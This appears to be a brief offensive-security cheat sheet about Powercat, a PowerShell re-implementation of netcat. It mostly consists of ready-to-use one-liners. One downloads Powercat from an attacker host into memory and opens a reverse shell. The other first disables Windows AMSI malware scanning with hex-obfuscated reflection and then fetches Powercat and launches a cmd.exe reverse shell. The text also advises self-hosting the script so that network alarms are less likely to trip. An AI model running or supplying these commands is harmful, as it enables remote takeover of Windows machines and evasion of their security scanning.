Powercat is a PowerShell-native re-implementation of netcat. Powercat can be installed on Kali Linux using sudo apt install powercat; the script can be found at /usr/share/windows-resources/powercat/powercat.ps1.

To execute:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://$ATTACKER_IP:$ATTACKER_DOWNLOAD_PORT/powercat.ps1');powercat -c $ATTACKER_IP -p $ATTACKER_PORT -e cmd"

One line reverse shell

All-in-one Windows reverse shell with Powercat

This disables AMSI, downloads Powercat into memory, invokes the module, and fires up a reverse shell.

[REF].Assembly.GetType('System.Management.Automation.'+$("41 6D 73 69 55 74 69 6C 73".Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$result=$result+$_};$result)).GetField($("61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64".Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$result2=$result2+$_};$result2),'NonPublic,Static').SetValue($null,$true); IEX (New-Object System.Net.Webclient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1"); powercat -c $ATTACKER_IP -p $ATTACKER_PORT -e cmd.exe

It’s probably advisable to use your own server to host Powercat in order to make tripping network alarms less likely.

Link to original